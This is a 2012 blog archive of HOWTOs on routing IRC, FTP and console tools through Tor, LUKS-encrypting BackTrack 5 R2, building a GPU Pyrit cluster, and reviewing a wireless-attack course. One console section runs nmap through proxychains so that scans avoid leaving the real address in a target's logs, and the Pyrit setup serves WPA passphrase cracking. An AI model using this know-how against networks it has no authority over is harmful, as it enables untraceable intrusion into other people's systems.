Wednesday, March 28, 2012

HOWTO : Using The Onion Router (Tor) anonymously

Part A - Installation of Tor

(A1) Ubuntu or BackTrack 5 R2

Step 1 :

sudo add-apt-repository ppa:ubun-tor/ppa
sudo apt-get update
sudo apt-get install tor tor-geoipdb privoxy vidalia


Step 2 :

sudo nano /etc/privoxy/config

Append the following line :

forward-socks5 / 127.0.0.1:9050 .

sudo /etc/init.d/privoxy start
sudo /etc/init.d/tor start


Step 2a (Optional) :

If you are behind a firewall, NAT or router and need to reach hosts on your own LAN directly, also append the following line to the configuration file. It forwards 192.168.x.x addresses directly instead of through Tor, so use it only for the local network :

forward 192.168.*.*/ .

Step 3 :

Go to the official Tor site to download and install Torbutton for Firefox :

https://www.torproject.org/dist/torbutton/torbutton-current.xpi

(A2) Windows 7

Download the current Tor Browser Bundle (2.2.35-8 at the time of writing).

https://www.torproject.org/dist/torbrowser/tor-browser-2.2.35-8_en-US.exe

Extract it, place the files in a folder and create a desktop shortcut to the launcher.

Part B - Installation of xChat

(B1) Ubuntu or BackTrack 5 R2

Step 4 :

dig +short irc.tor.freenode.net cname

The result is :

p4fsi4ockecnea7l.onion.

sudo nano /etc/tor/torrc

Append the following line. It maps a private IP address to the hidden service, so the IRC client never has to resolve the .onion name itself (which would fail or leak the lookup to your local resolver) and simply connects to 10.40.40.40 through the SOCKS proxy :

mapaddress 10.40.40.40 p4fsi4ockecnea7l.onion

Step 5 :

sudo /etc/init.d/tor restart

sudo apt-get install xchat

Step 6 :

If you already have a registered nickname on Freenode, skip this step. Otherwise register it :

/msg nickserv register [password] [email]

/msg nickserv set hidemail on

Step 7 :

In xChat, go to "Settings" | "Preferences" | "Network" | "Network setup" | "Proxy server" and enter :

Hostname : 127.0.0.1
Port : 9050
Type : Socks5
Use proxy for : IRC Server Only


Step 8 :

Create a new network called "TorifiedFreenode" in the xChat server list.

Press "Add" under its servers and enter "10.40.40.40" (the address mapped in torrc). Using the mapped IP rather than the .onion name means xChat never tries to resolve the hidden service address itself.

Step 9 :

Download cap_sasl_xchat.pl from http://lwsitu.com/xchat/cap_sasl_xchat.pl, save it in ~/.xchat2 and make it executable.

Step 10 :

In the xChat status window :

/sasl set TorifiedFreenode [your_Freenode_Nickname] [your_Nick_password] PLAIN
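What the cap_sasl_xchat.pl plugin does on the wire, as an added example (not the plugin's code and not part of the original post): IRCv3 CAP negotiation followed by SASL PLAIN (RFC 4616). The nickname, password and server name are placeholders, and the server transcript at the bottom is constructed to look like Freenode's replies. Note that PLAIN only base64-encodes the password; it is not encryption. Over Tor to the .onion address the whole path is encrypted by Tor, but outside Tor you would want TLS to the server first.

```python
import base64

IRC_AUTH_CHUNK = 400  # IRCv3 SASL: AUTHENTICATE payloads are sent in 400-byte pieces


def parse_irc(line):
    """Split one IRC line into (prefix, command, params); the trailing
    parameter after ' :' may contain spaces."""
    prefix = None
    if line.startswith(":"):
        prefix, line = line[1:].split(" ", 1)
    if " :" in line:
        head, trailing = line.split(" :", 1)
        params = head.split() + [trailing]
    else:
        params = line.split()
    return prefix, params[0], params[1:]


def sasl_plain_payload(authzid, authcid, password):
    """RFC 4616 PLAIN: authzid NUL authcid NUL password, base64-encoded for the
    AUTHENTICATE command.  Freenode accepted the nickname as both ids."""
    raw = b"\x00".join(s.encode("utf-8") for s in (authzid, authcid, password))
    return base64.b64encode(raw).decode("ascii")


def authenticate_lines(payload):
    """Split a payload into AUTHENTICATE commands of at most 400 bytes.  An
    empty payload, or one whose last piece is exactly 400 bytes, is
    terminated by a lone '+'."""
    chunks = [payload[i:i + IRC_AUTH_CHUNK]
              for i in range(0, len(payload), IRC_AUTH_CHUNK)]
    if not chunks or len(chunks[-1]) == IRC_AUTH_CHUNK:
        chunks.append("+")
    return ["AUTHENTICATE " + c for c in chunks]


def registration_lines(nick):
    """What the client sends first: ask for capabilities before registering."""
    return ["CAP LS", "NICK " + nick, "USER %s 0 * :%s" % (nick, nick)]


def respond(server_line, nick, password):
    """Client side of the exchange: given one server line, return the lines
    to send next (possibly none).  Raises on an SASL failure reply."""
    _, cmd, params = parse_irc(server_line)
    if cmd == "CAP" and len(params) >= 3:
        sub, caps = params[1], params[-1].split()
        if sub == "LS":
            return ["CAP REQ :sasl"] if "sasl" in caps else ["CAP END"]
        if sub == "ACK" and "sasl" in caps:
            return ["AUTHENTICATE PLAIN"]
        if sub == "NAK":
            return ["CAP END"]
    if cmd == "AUTHENTICATE" and params == ["+"]:
        return authenticate_lines(sasl_plain_payload(nick, nick, password))
    if cmd == "903":                            # RPL_SASLSUCCESS
        return ["CAP END"]
    if cmd in ("904", "905", "906", "907"):     # ERR_SASLFAIL and friends
        raise RuntimeError("SASL failed: " + params[-1])
    return []


def run_exchange(server_lines, nick, password):
    """Drive respond() over a scripted server transcript and return every
    client line in the order it would be sent."""
    sent = registration_lines(nick)
    for line in server_lines:
        sent.extend(respond(line, nick, password))
    return sent


# Constructed transcript of a Freenode-style server; server name and the
# numeric reply texts are illustrative, not captured from a real session.
SAMPLE_SERVER = [
    ":irc.example.net CAP * LS :account-notify extended-join multi-prefix sasl",
    ":irc.example.net CAP * ACK :sasl",
    "AUTHENTICATE +",
    ":irc.example.net 900 alice alice!alice@tor-sasl/alice alice :You are now logged in as alice",
    ":irc.example.net 903 alice :SASL authentication successful",
]

if __name__ == "__main__":
    for line in run_exchange(SAMPLE_SERVER, "alice", "s3cret"):
        print("C>", line)
```

Running the script prints the client half of the dialogue; the AUTHENTICATE line carries the base64 of the NUL-separated credentials, which is why the connection must already be protected (here by Tor) before that line is sent.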

Step 11 :

Block CTCP and DCC requests sent to your IRC client. A CTCP VERSION reply fingerprints your client, and an accepted DCC request sets up a direct connection that bypasses Tor and exposes your real IP address :

/ignore *!*@* CTCP DCC
/ignore * CTCP DCC

/set irc_hide_version ON
/set dcc_auto_chat 0
/set dcc_auto_resume OFF
/set dcc_auto_send 0


(B2) Windows 7

Step 12 :

Download xChat from http://www.silverex.org/download/ and install it.

Step 12a :

In the Vidalia Control Panel, select "Settings" | "Advanced" | "Edit current torrc" and append the following line :

mapaddress 10.40.40.40 p4fsi4ockecnea7l.onion

Step 13 :

Download the ActivePerl version 5.12.4.1205 at http://www.activestate.com/activeperl/downloads/thank-you?dl=http://downloads.activestate.com/ActivePerl/releases/5.12.4.1205/ActivePerl-5.12.4.1205-MSWin32-x86-294981.msi

Step 14 :

Download xcperl5.12.1.dll from http://lwsitu.com/xchat/xcperl5.12.1.dll

Save it in C:\Program Files (x86)\X-Chat 2\plugins and delete the existing xcperl.dll. This is a third-party binary plugin, so fetch it over a channel you trust and be aware that you are running someone else's compiled code inside your IRC client.

Step 15 :

Follow Steps 6 to 11 above.

Part C - Installation of Filezilla

(C1) Ubuntu and BackTrack 5 R2

Step 16 :

sudo apt-get update
sudo apt-get install filezilla


Step 17 :

Plain FTP sends your username, password and data in the clear, so the Tor exit node (or anyone between it and the server) can read them. Prefer SFTP, which FileZilla also supports, or at least FTP over TLS, when using this setup.

Open FileZilla, go to "Edit" | "Settings" | "Generic proxy" :

Select "Socks5"

proxy host : 127.0.0.1
proxy port : 9050



(C2) Windows 7

Step 18 :

Download the current Windows version :

http://filezilla-project.org/download.php?type=client

Then follow Step 17 above.

Part D - Using Tor in Console

Ubuntu and BackTrack 5 R2 only.

Step 19 :

sudo apt-get update
sudo apt-get install proxychains elinks


Step 20 :

sudo nano /etc/proxychains.conf

Change the following line, and leave the proxy_dns setting enabled (it is on by default) so that hostname lookups also go through the chain instead of leaking to the local resolver :

socks4 127.0.0.1 9050

To :

socks5 127.0.0.1 9050

Step 21 :

Usage (nmap must use a TCP connect scan, -sT, and skip host discovery, -Pn: SYN scans and ICMP probes use raw sockets that bypass proxychains and would leave your real address in the target's logs) -

proxychains nmap -sT -Pn google.com
proxychains elinks cmyip.com
proxychains elinks www.whatismyip.com
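The common point of forward-socks5 in Privoxy, the Socks5 setting in xChat and FileZilla, and socks5 in proxychains is that the proxy, i.e. Tor, resolves hostnames. A client that resolves the name itself and hands Tor an IP address (what plain SOCKS4 does) leaks every destination to your ISP's resolver. The following added example (not the page's code and not from the Tor project) shows the handshake explicitly: a minimal SOCKS5 client that always sends the destination as a domain name (address type 0x03). It assumes Tor's default SOCKS port 127.0.0.1:9050 without authentication; the check.torproject.org request in the main section is an assumption about that service's current API and only runs when the script is executed directly.

```python
import socket
import ssl
import struct

SOCKS_VERSION = 5
METHOD_NO_AUTH = 0x00
CMD_CONNECT = 0x01
ATYP_IPV4, ATYP_DOMAIN, ATYP_IPV6 = 0x01, 0x03, 0x04
REPLY_TEXT = {
    0x00: "succeeded", 0x01: "general SOCKS server failure",
    0x02: "connection not allowed by ruleset", 0x03: "network unreachable",
    0x04: "host unreachable", 0x05: "connection refused", 0x06: "TTL expired",
    0x07: "command not supported", 0x08: "address type not supported",
}
TOR_SOCKS = ("127.0.0.1", 9050)   # Tor's default SocksPort, as used in the HOWTO


def build_greeting():
    """Version identifier / method selection: we offer only 'no authentication'."""
    return bytes([SOCKS_VERSION, 1, METHOD_NO_AUTH])


def build_connect(host, port):
    """CONNECT request.  The destination is always sent as a domain name
    (ATYP 0x03) so that the proxy, i.e. Tor, resolves it.  Handing over a
    literal IP would mean this machine had already done a DNS lookup in the
    clear, which is exactly the leak SOCKS4 (not 4a) causes.  Internationalised
    names are expected to be punycode already (ASCII)."""
    hostb = host.encode("ascii")
    if not 0 < len(hostb) <= 255:
        raise ValueError("hostname must be 1..255 bytes for SOCKS5")
    return (bytes([SOCKS_VERSION, CMD_CONNECT, 0x00, ATYP_DOMAIN, len(hostb)])
            + hostb + struct.pack("!H", port))


def parse_reply(data):
    """Parse a SOCKS5 reply into (reply code, bound address, bound port)."""
    if len(data) < 4 or data[0] != SOCKS_VERSION:
        raise ValueError("not a SOCKS5 reply")
    code, atyp = data[1], data[3]
    if atyp == ATYP_IPV4:
        addr, off = socket.inet_ntoa(data[4:8]), 8
    elif atyp == ATYP_IPV6:
        addr, off = socket.inet_ntop(socket.AF_INET6, data[4:20]), 20
    elif atyp == ATYP_DOMAIN:
        n = data[4]
        addr, off = data[5:5 + n].decode("ascii"), 5 + n
    else:
        raise ValueError("unknown address type 0x%02x" % atyp)
    if len(data) < off + 2:
        raise ValueError("truncated SOCKS5 reply")
    return code, addr, struct.unpack("!H", data[off:off + 2])[0]


def connect_via_tor(host, port, proxy=TOR_SOCKS, timeout=60):
    """Return a TCP socket connected to host:port through the Tor SOCKS port."""
    s = socket.create_connection(proxy, timeout=timeout)
    try:
        s.sendall(build_greeting())
        if s.recv(2) != bytes([SOCKS_VERSION, METHOD_NO_AUTH]):
            raise OSError("proxy rejected the no-authentication method")
        s.sendall(build_connect(host, port))
        code, _, _ = parse_reply(s.recv(262))   # 4 + 1 + 255 + 2 is the largest reply
        if code != 0x00:
            raise OSError("SOCKS5 CONNECT failed: " + REPLY_TEXT.get(code, hex(code)))
    except Exception:
        s.close()
        raise
    return s


if __name__ == "__main__":
    # Assumption: check.torproject.org/api/ip answers with JSON containing "IsTor".
    host = "check.torproject.org"
    raw = connect_via_tor(host, 443)
    tls = ssl.create_default_context().wrap_socket(raw, server_hostname=host)
    tls.sendall(b"GET /api/ip HTTP/1.0\r\nHost: " + host.encode() + b"\r\n\r\n")
    chunks = []
    while True:
        part = tls.recv(4096)
        if not part:
            break
        chunks.append(part)
    tls.close()
    print(b"".join(chunks).decode("utf-8", "replace"))
```

If the printed JSON says IsTor is true, the whole chain (TCP to 9050, name resolution, exit) went through Tor; if the script fails at the greeting, nothing is listening on 9050 and the other tools on this page would silently fall back or fail in the same way.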


That's all! See you.

Saturday, March 10, 2012

HOWTO : Encrypt/Decrypt BackTrack 5 R2 with Passphrase

Credit to : Infosec Ramblings and Hak5.org

Step 1 :

The hard drive partitioning is as the following :

/dev/sda1 for /boot
/dev/sda5 for /

Assume the hard drive is brand new.

fdisk /dev/sda
n
p
1
+4G
n
e
2
n
l
p
w


* where +4G sets /dev/sda1 (/boot) to 4GB. You can use +1024M or smaller.

Step 2 :

cryptsetup -y -c aes-xts-plain -s 512 luksFormat /dev/sda5
cryptsetup luksOpen /dev/sda5 haktop


* where haktop is the name of the unlocked (mapped) device, i.e. /dev/mapper/haktop. Note that the plain IV used by aes-xts-plain wraps after 2 TiB; for larger volumes use aes-xts-plain64.

Step 3 :

mkfs.ext2 /dev/sda1
mkfs.ext4 /dev/mapper/haktop


Step 4 :

Install BackTrack 5 R2 as usual, but choose manual partitioning and do not format the partitions. Use /dev/mapper/haktop as ext4 mounted at / and /dev/sda1 as ext2 mounted at /boot.

Make sure the bootloader is installed to /dev/sda.

Step 5 :

Once the installation is complete, select "Continue testing" and do not reboot. Then set up a chroot into the new system :

mkdir /mnt/haktop

mount /dev/mapper/haktop /mnt/haktop/
mount /dev/sda1 /mnt/haktop/boot

chroot /mnt/haktop/

mount -t proc proc /proc
mount -t sysfs sys /sys/


Step 6 :

Get the UUID of /dev/sda5 (the LUKS container) from another terminal :

blkid /dev/sda5

Copy down the UUID of the /dev/sda5.

nano /etc/crypttab

haktop /dev/disk/by-uuid/<UUID Key> none luks

Step 7 :

nano /usr/share/initramfs-tools/scripts/local-top/cryptroot

Locate the following :

# Try to get a satisfactory password $crypttries times
   count=0
   while [ $crypttries -le 0 ] || [ $count -lt $crypttries ]; do


Change to :

count=0
echo "Unlocking the disk $cryptsource ($crypttarget)"
while [ $crypttries -le 0 ] || [ $count -lt $crypttries ]; do


Locate the following :

if [ -z "$cryptkeyscript" ]; then
   cryptkey="Unlocking the disk $cryptsource ($crypttarget)\nEnter passphrase: "
if [ -x /bin/plymouth ] && plymouth --ping; then


Change to :

if [ -z "$cryptkeyscript" ]; then
   cryptkey="Enter passphrase: "
if [ -x /bin/plymouth ] && plymouth --ping; then


Step 7a :

update-initramfs -u

fix-splash

Now reboot. The boot will halt at the BackTrack 5 splash screen. Press F8, delete the "****" already typed at the prompt, and enter your passphrase to boot the system.

Alternatively, just type the passphrase while the boot is stopped at the splash screen.

Step 8 : (Optional)

If you do not want to press F8, remove "splash" from the kernel line shown below. Note that grub.cfg is regenerated by update-grub (for example when a new kernel is installed), so to make the change permanent also remove "splash" from GRUB_CMDLINE_LINUX_DEFAULT in /etc/default/grub and run update-grub.

nano /boot/grub/grub.cfg

Locate the following :

linux /vmlinuz-3.2.6 root=/dev/mapper/haktop ro text splash vga=791

To make it look likes :

linux /vmlinuz-3.2.6 root=/dev/mapper/haktop ro text vga=791

Then, you will be prompted for entering your passphrase on every boot up.

Step 9 :

After the system has booted, create a swap file. Because /swapfile1 lives on the encrypted root, whatever is paged out is encrypted as well; do not put swap on an unencrypted partition, or key material and page contents will be written to disk in the clear.

dd if=/dev/zero of=/swapfile1 bs=1M count=8192

* Where count=8192 is 8GB

mkswap /swapfile1
chown root:root /swapfile1
chmod 0600 /swapfile1

swapon /swapfile1

nano /etc/fstab

/swapfile1 swap swap defaults 0 0


Then reboot the system.

See Also : HOWTO : Encrypt/Decrypt BackTrack 5 R2 with USB stick


That's all! See you.

Friday, March 09, 2012

HOWTO : Encrypt/Decrypt BackTrack 5 R2 with USB stick

Credit to : Hak5.org

Step 1 :

To identify the devices :

sfdisk -l /dev/sda
sfdisk -l /dev/sdc


*** Where sda is my hard drive and sdc is the USB stick

Step 2 :

Repartition both devices with a single primary Linux partition (d deletes the existing partition, n p 1 creates a new primary partition accepting the default size, p prints the table and w writes it) :

fdisk /dev/sda
d
n
p
1
p
w


fdisk /dev/sdc
d
n
p
1
p
w


Step 3 :

Read 64 bytes starting at offset 32 of the USB stick (inside the MBR boot-code area, which the bootloader installation in Step 5 will overwrite) and use them as the LUKS key :

dd if=/dev/sdc bs=1 count=64 skip=32 of=/tmp/first.key

cryptsetup -c aes-xts-plain -s 512 luksFormat /dev/sda1 /tmp/first.key

cryptsetup -d /tmp/first.key luksOpen /dev/sda1 mylaptop

ls /dev/mapper


Step 4 :

mkfs.ext2 /dev/sdc1

mkfs.ext4 /dev/mapper/mylaptop


*** where mylaptop is the name of the mapped (unlocked) device.

Step 5 :

Install BackTrack 5 R2 as usual, but do not format the partitions. Use /dev/mapper/mylaptop as ext4 mounted at / and /dev/sdc1 as ext2 mounted at /boot.

After that, make sure the bootloader is installed to /dev/sdc (the USB stick).

Step 6 :

Once the installation is completed, select "Continue testing" and do not reboot.

Installing the bootloader in Step 5 overwrote the boot code on /dev/sdc, including the bytes the key was taken from, so read the key region again :

dd if=/dev/sdc bs=1 count=64 skip=32 of=/tmp/second.key

Make sure the two keys are different; compare them with :

sha1sum /tmp/*key

Bear in mind that this region on a GRUB-installed stick is GRUB's own boot code and therefore largely predictable: what protects the volume is possession of the stick, not the secrecy of those 64 bytes. Keeping a passphrase in a spare key slot is a sensible recovery path in case the stick is ever rewritten.
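Why the key bytes change between Step 3 and Step 6, as an added example that is not part of the original post: the dd command reads bytes 32..95 of the stick, which lie in the 440-byte boot-code area of the MBR (the partition table starts at byte 446 and the 0x55AA signature at byte 510). Installing GRUB to /dev/sdc in Step 5 rewrites exactly that area, so the key read afterwards differs while the partition table survives. The disk image, the "vendor" boot code and the stand-in for GRUB's boot.img below are constructed in memory; nothing is written to a real device.

```python
import hashlib
import os

KEY_OFFSET, KEY_LEN = 32, 64              # dd skip=32 count=64 from the HOWTO
BOOT_CODE_END = 440                       # MBR: boot code occupies bytes 0..439
PART_TABLE_OFF, PART_TABLE_LEN = 446, 64  # four 16-byte partition entries
SECTOR = 512


def extract_key(image, offset=KEY_OFFSET, length=KEY_LEN):
    """The same bytes the page's dd command reads, taken from a bytes-like
    image of the whole device (not of a partition)."""
    key = bytes(image[offset:offset + length])
    if len(key) != length:
        raise ValueError("image shorter than the key region")
    return key


def fingerprint(key):
    """Hex SHA-1, i.e. what `sha1sum /tmp/*key` prints for comparison."""
    return hashlib.sha1(key).hexdigest()


def make_mbr(boot_code, partition_table):
    """Assemble a 512-byte MBR: boot code (at most 440 bytes), a 64-byte
    partition table at offset 446 and the 0x55AA signature at offset 510."""
    if len(boot_code) > BOOT_CODE_END or len(partition_table) != PART_TABLE_LEN:
        raise ValueError("bad MBR component size")
    mbr = bytearray(SECTOR)
    mbr[:len(boot_code)] = boot_code
    mbr[PART_TABLE_OFF:PART_TABLE_OFF + PART_TABLE_LEN] = partition_table
    mbr[510:512] = b"\x55\xaa"
    return bytes(mbr)


def install_bootloader(image, new_boot_code):
    """Model of what grub-install does to the first sector: it replaces the
    boot-code area and leaves the partition table and signature alone."""
    if len(new_boot_code) > BOOT_CODE_END:
        raise ValueError("boot code too large for the MBR")
    out = bytearray(image)
    out[:BOOT_CODE_END] = b"\x00" * BOOT_CODE_END
    out[:len(new_boot_code)] = new_boot_code
    return bytes(out)


def key_changed(before, after):
    """The check behind 'make sure the keys are different' in Step 6."""
    return fingerprint(extract_key(before)) != fingerprint(extract_key(after))


def demo():
    """Walk through Steps 3, 5 and 6 on a constructed one-sector image and
    return (first_key, second_key, keys_differ)."""
    vendor_boot = os.urandom(BOOT_CODE_END)              # stand-in for factory boot code
    entry = (bytes([0x80, 1, 1, 0, 0x83, 0xfe, 0xff, 0xff])   # bootable, type 0x83 (Linux)
             + (2048).to_bytes(4, "little") + (1024000).to_bytes(4, "little"))
    table = entry + b"\x00" * (PART_TABLE_LEN - len(entry))
    fresh = make_mbr(vendor_boot, table)
    first_key = extract_key(fresh)                        # Step 3: /tmp/first.key
    after_grub = install_bootloader(fresh, os.urandom(300))  # Step 5, boot.img stand-in
    second_key = extract_key(after_grub)                  # Step 6: /tmp/second.key
    assert after_grub[PART_TABLE_OFF:PART_TABLE_OFF + PART_TABLE_LEN] == table
    return first_key, second_key, key_changed(fresh, after_grub)


if __name__ == "__main__":
    k1, k2, differ = demo()
    print("first.key  sha1:", fingerprint(k1))
    print("second.key sha1:", fingerprint(k2))
    print("keys differ after bootloader install:", differ)
```

The same model explains the failure mode to watch for later: any tool that rewrites the stick's MBR (a second grub-install, a partitioning tool, a vendor utility) silently changes the key, which is why Step 7 keeps both values in separate LUKS key slots.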

Step 7 :

cryptsetup -d /tmp/first.key luksAddKey /dev/sda1 /tmp/second.key

mkdir /mnt/mylaptop

mount /dev/mapper/mylaptop /mnt/mylaptop/
mount /dev/sdc1 /mnt/mylaptop/boot

chroot /mnt/mylaptop/

mount -t proc proc /proc
mount -t sysfs sys /sys/


Step 8 :

Get the UUID of the LUKS container :

blkid /dev/sda1

nano /etc/crypttab

mylaptop /dev/disk/by-uuid/<UUID Key> none luks

nano /etc/fstab

/dev/sdb1 /boot ext2 defaults 0 2

* /boot is /dev/sdb1 here, not /dev/sdc1, because once the installed system boots from the USB stick without the live CD the stick is enumerated as /dev/sdb. Using UUID=<UUID of the boot partition> instead of a device name avoids this kind of renumbering.


Step 9 :

After that, boot BackTrack 5 R2 from the USB stick. Because crypttab has no key script, the initramfs cannot unlock the root volume and drops you into the BusyBox shell.

At the BusyBox prompt, enter the following commands to unlock the partition (the stick is /dev/sdb at this point). You must enter them on every boot.

dd if=/dev/sdb bs=1 count=64 skip=32 of=/tmp/mykey.key

cryptsetup -d /tmp/mykey.key luksOpen /dev/sda1 mylaptop


Then press Ctrl-D to continue the boot process.

Step 10 :

After the system has booted, create a swap file. Keep it on the encrypted root as shown, so that whatever is paged out (including key material) never reaches the disk in the clear.

dd if=/dev/zero of=/swapfile1 bs=1M count=512

* Where count=512 is 512M

mkswap /swapfile1
chown root:root /swapfile1
chmod 0600 /swapfile1

swapon /swapfile1

nano /etc/fstab

/swapfile1 swap swap defaults 0 0


Then reboot the system.

Remarks :

You are required to enter these commands on every boot up.

dd if=/dev/sdb bs=1 count=64 skip=32 of=/tmp/mykey.key

cryptsetup -d /tmp/mykey.key luksOpen /dev/sda1 mylaptop


See Also : HOWTO : Encrypt/Decrypt BackTrack 5 R2 with Passphrase

That's all! See you.

HOWTO : Pyrit Cluster with BackTrack 5 R2

Install nVidia CUDA drivers and Pyrit as described here

(A) The server (with the GPUs) Settings

Run pyrit at least once and it will create ~/.pyrit/config with the following contents :

default_storage = file://
limit_ncpus = 0
rpc_announce = true
rpc_announce_broadcast = false
rpc_knownclients =
rpc_server = false
workunit_size = 75000


If Hyper-Threading is enabled on your system, set "limit_ncpus" to the number of physical cores. For example, my system has 6 physical cores with HT enabled, so the setting is :

limit_ncpus = 6

Bug fix :

nano /usr/local/lib/python2.6/dist-packages/cpyrit/network.py

Locate the following lines :

except socket.error:
   break
if essid != '' or pwbuffer != '':
   pwlist = storage.PAW2_Buffer()
   pwlist.unpack(pwbuffer.data)
   self.client.enqueue(essid, pwlist)
else:
   time.sleep(1)


Change it to :

except socket.error:
   break
if essid != '' or pwbuffer != '':
   pwlist = storage.PAW2_Buffer(pwbuffer.data)
   self.client.enqueue(essid, pwlist)
else:
   time.sleep(1)


Boost the network performance :

nano /usr/local/lib/python2.6/dist-packages/cpyrit/network.py

Locate the following lines :

essid, pwbuffer = \
   self.server.gather(self.client.uuid, 5000)


Change it to :

essid, pwbuffer = \
   self.server.gather(self.client.uuid, 90000)


(B) The client (without or with GPUs) Settings

Clients do not need the nVidia drivers; just install BackTrack 5 R2 as is. However, if a client does have an nVidia card, install the nVidia drivers as described above.

The following settings should be set on every client machine.

Run pyrit at least once and it will create ~/.pyrit/config with the following contents :

default_storage = file://
limit_ncpus = 0
rpc_announce = true
rpc_announce_broadcast = false
rpc_knownclients = 192.168.0.100
rpc_server = true
workunit_size = 75000


** if you have more than one server, list all of their IP addresses :

rpc_knownclients = 192.168.0.100 192.168.0.150

Bug fix :

nano /usr/local/lib/python2.6/dist-packages/cpyrit/network.py

Locate the following lines :

except socket.error:
   break
if essid != '' or pwbuffer != '':
   pwlist = storage.PAW2_Buffer()
   pwlist.unpack(pwbuffer.data)
   self.client.enqueue(essid, pwlist)
else:
   time.sleep(1)


Change it to :

except socket.error:
   break
if essid != '' or pwbuffer != '':
   pwlist = storage.PAW2_Buffer(pwbuffer.data)
   self.client.enqueue(essid, pwlist)
else:
   time.sleep(1)


Boost the network performance :

nano /usr/local/lib/python2.6/dist-packages/cpyrit/network.py

Locate the following lines :

essid, pwbuffer = \
   self.server.gather(self.client.uuid, 5000)


Change it to :

essid, pwbuffer = \
   self.server.gather(self.client.uuid, 90000)


(C) How to run

On the server

pyrit serve

On the client

pyrit benchmark

Remarks :

I have tested these settings on my system with a VirtualBox client. The performance of Pyrit dropped by about half, because the VirtualBox client is not on a real network and its CPUs are virtual.

By the way, the performance of the cluster drops a lot even on a home gigabit network, for example with a ThinkPad X100e (AMD CPU, no GPU) as the client. I think Pyrit is not very good in a networked environment at the moment, and the CPU power of the client matters too.

That's all! See you.

Thursday, March 08, 2012

HOWTO : BackTrack 5 R2 on Intel X79 Express and nVidia display cards chipset

UPDATE : The better way is here.

Hardware

CPU : Intel i7-3930K (Socket 2011, 6 cores / 12 threads with HT)
Display card : 2 x nVidia GeForce GTX 590 (1024 CUDA cores per card)

Installation of BackTrack 5 R2

BackTrack 5 R2 boots on an Intel X79 Express chipset motherboard with two nVidia GeForce GTX 590 cards, but "nomodeset" must be added to the boot options (press "tab" on the boot menu).

Install BackTrack 5 R2 as usual. When asked to reboot, do not remove the BackTrack 5 R2 CD; boot from the CD again. Once BackTrack 5 R2 is up, mount the hard drive and add "nomodeset" to the kernel boot options in grub.cfg under /boot/grub.

Then reboot and remove the CD. The system will boot into BackTrack 5 R2 without problems.

If the kernel is upgraded, you should rebuild the kernel headers by the following steps :

prepare-kernel-sources
cd /usr/src/linux
cp -rf include/generated/* include/linux/


Installation of nVidia display driver

Go to the nVidia Developer Zone CUDA Toolkit 4.1 page to download the following. Do not start X11 with "startx" before running the installers, otherwise the driver installation will fail.

(1) Download "Latest Drivers for Linux (295.20)" for the nVidia driver. You can download the files from X11 first and run the installer after logging out to the console.

32-bit :
http://www.nvidia.com/object/linux-display-ia32-295.20-driver.html

64-bit :
http://www.nvidia.com/object/linux-display-amd64-295.20-driver.html

Installation :

32-bit :
chmod +x NVIDIA-Linux-x86-295.20.run
./NVIDIA-Linux-x86-295.20.run


64-bit :
chmod +x NVIDIA-Linux-x86_64-295.20.run
./NVIDIA-Linux-x86_64-295.20.run


After that, you can reboot your system.

Then run the following command to make the suitable resolution :
nvidia-xconfig

(2) Download "CUDA Toolkit for Ubuntu Linux 10.04" for the CUDA Toolkit.

32-bit :
wget http://developer.download.nvidia.com/compute/cuda/4_1/rel/toolkit/cudatoolkit_4.1.28_linux_32_ubuntu10.04.run

64-bit :
wget http://developer.download.nvidia.com/compute/cuda/4_1/rel/toolkit/cudatoolkit_4.1.28_linux_64_ubuntu10.04.run

chmod +x cudatoolkit_4.1.28_linux_xx_ubuntu10.04.run
./cudatoolkit_4.1.28_linux_xx_ubuntu10.04.run

*** where xx is 32 or 64, matching the file you downloaded.

*** Accept the default settings.

(3) Download "GPU Computing SDK" for the nVidia SDK.

wget http://developer.download.nvidia.com/compute/cuda/4_1/rel/sdk/gpucomputingsdk_4.1.28_linux.run

chmod +x gpucomputingsdk_4.1.28_linux.run
./gpucomputingsdk_4.1.28_linux.run


nano /root/.bashrc

Append the following :

PATH=$PATH:/usr/local/cuda/bin
LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/usr/local/cuda/lib:/usr/local/cuda/lib64
export PATH
export LD_LIBRARY_PATH


source /root/.bashrc
ldconfig


After that, reboot the system to make the nVidia driver effect.

Compile Sample code of CUDA

apt-get install freeglut3-dev libxi-dev libxmu-dev

cd NVIDIA_GPU_Computing_SDK/C
make


Then, run the sample codes at :

cd NVIDIA_GPU_Computing_SDK/C/bin/linux/release
./deviceQuery
./nbody


Installation of pyrit

Add the following to /etc/apt/sources.list :

deb http://security.ubuntu.com/ubuntu lucid-security main
apt-get update
apt-get install libssl-dev scapy python-dev

Then delete the newly added entry from sources.list.

apt-get update

Go to the official site of pyrit.

cd ~
svn checkout http://pyrit.googlecode.com/svn/trunk/ pyrit

cd pyrit
python setup.py build
python setup.py install


cd cpyrit
python setup.py build
python setup.py install


To test whether the installation is correct :

pyrit list_cores
pyrit benchmark
pyrit benchmark_long


Remarks :

Fix the splash :
fix-splash

Install the sensors :
apt-get install sensors-applet

Pyrit Cluster Setup
John the Ripper Cluster Setup

See Also : HOWTO : Pyrit Cluster with BackTrack 5 R2

*** Whenever the Linux kernel is updated or upgraded, the nVidia driver must be reinstalled to match the new kernel version.

That's all! See you.

Before water cooling



After water cooling

Friday, February 24, 2012

Course Review - Offensive Security Wireless Attacks (WiFu)

The Background

After passing the OSCP, I enrolled in the Offensive Security Wireless Attacks (aka WiFu) course. The course is about attacking a wireless router whether it is set to WEP, WPA or WPA2.

The Hardware

You need at least one wireless device to act as the victim (a laptop with a wireless card, or a smartphone such as an Android or iPhone) and a computer running BackTrack 5 R1 as the attacker. The attacker machine should have a USB adapter (one of the adapters recommended on the official site). If you have no wireless device to use as the victim, consider buying a wireless USB dongle for your desktop.

Furthermore, you also need a wireless router or access point that supports WEP and WPA/WPA2 (recommended models are listed on the official site).

Beware that not all wireless dongles and cards support packet injection and monitor mode. In addition, some wireless routers behave unexpectedly under attack. For example, my dd-wrt flashed TP-LINK TL-WR1043ND does not work with some of the attacks, such as the Korek chopchop attack; indeed not every access point is susceptible to chopchop. Therefore, buying the hardware suggested on the official website is recommended.

At the time of writing, the Netgear WNR1000v2h2 N150 can be bought in Hong Kong and is not expensive. However, I am not sure it is the exact model listed on the official site. Do not upgrade its firmware; downgrade it to v1.0.1.1, because the other firmware versions do not offer WEP. The older firmware can be downloaded from the Netgear official site.

My hardware for the lab is as follows. I hope it gives you some ideas :
(1) Access Point - TP-LINK TL-WR1043ND (flashed with dd-wrt v24-sp2 18024) (injection against it works)
(2) Access Point - Netgear WNR1000v2h2 N150 (firmware v1.0.1.1)
